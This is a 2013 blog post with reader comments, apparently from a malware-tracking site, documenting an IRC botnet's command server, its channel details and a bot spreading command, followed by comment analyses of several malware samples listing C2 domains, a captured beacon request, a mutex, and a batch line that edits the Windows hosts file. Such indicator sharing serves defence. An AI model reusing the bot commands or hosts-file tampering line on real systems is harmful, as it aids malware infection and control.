were.hacked.jp(irc botnet hosted in France Roubaix Ovh Systems)

Thanks to anonymous guy in this post for the sample

Resolved : [were.hacked.jp] To []

Server Password:
Username: __x00
Nickname: {x00-00-DEU-XP-DELL-9640}
Channel: ###x00### (Password: )
Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x

sample here

hosting infos:

Categories: Uncategorized


Anonymous - May 6, 2013 at 9:26 pm

Here's the "anonymous guy" ip:, he's being ddosed for a month.

Anonymous - May 7, 2013 at 4:31 am

Hello pig, just wondering where do you get your maleware from?

Where do you search?

Pig - May 7, 2013 at 3:52 pm

1 month ddos for panama ip ? u must be raged to death lool

Anonymous - May 7, 2013 at 7:35 pm

the sample is deleted can you upload again

Anonymous - May 8, 2013 at 3:19 am

Anonymous - May 8, 2013 at 12:32 pm



http bot i think communicates to random shitted domains.
kinda advanced i think 😀

Anonymous - May 8, 2013 at 2:27 pm

Pig - May 8, 2013 at 4:26 pm

txx.exe connects here :hxxp://

POST /G@t3/1nPu7.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)
Content-Length: 263
Connection: Keep-Alive
Cache-Control: no-cache

xdf8$&xf2s~ixb3cxb3xf5!x16a(Z kx1d(, Rxe6x85 xdexc3x1bx7fxddxf4x0exc9Kx1f'xed)WxcePx8675Gxa7x04jx7fxe2x8c*B4xddJx1fx87x0fGx85xaf6xa7Y;xd5xd2x184xb1xb7_,pxcaesxb3Hxcfxeexff=x035x8d*x9axc8xd8xaaf|Hxfdx99xabw5x14Qx01xb3xecxf8xf6xa3&xcdxdcxfb

Download URLs
hxxp:// theyre not active now
Outgoing connection to remote server: TCP port 3128

Pig - May 8, 2013 at 4:35 pm

helpxx.exe is a sfx archive with 2 files inside host.bat and winhelp.exe

host.bat:echo inf0nix.com >> %Systemroot%system32driversetchosts
winhelp.exe: connects to hxxp://inf0nix.com/notify.php

Pig - May 8, 2013 at 4:55 pm

this is the domain name for fU1.exe files.g00n.pl the rest are random domain names created by the malware like this http://www.bpfq02.com/www.inform1ongung.info

the http query is this :files.g00n.pl/dev/ip.php
this is the mutex name for this malware:_kuku_joker_v4.00

Pig - May 8, 2013 at 5:05 pm

fsvchost.exe does this:Copies self to other locations
Creates files in windows system directory
Creates system services or drivers
Load system drivers

Mutex created still same:_kuku_joker_v4.00

HTTP Queries:inf1nix.com GET /notify.php HTTP/1.1
http://www.bpfq02.com GET /t_100_v400/?rnd=247500&id=23104616288 HTTP/1.1
http://www.inform1ongung.info GET /t_100_v400/?rnd=252937&id=23104616288 HTTP/1.1

this is the malware version :User-Agent: KUKU v4.00 alpha

malware disables safeboot

new domain name here:inf1nix.com

Pig - May 8, 2013 at 5:09 pm

svchost-x.exe is same shit as txx.exe

Pig - May 8, 2013 at 5:09 pm

thank you for your submitions 🙂

Anonymous - May 8, 2013 at 5:29 pm

what is this bot btw?

Anonymous - May 8, 2013 at 6:51 pm

Comments are closed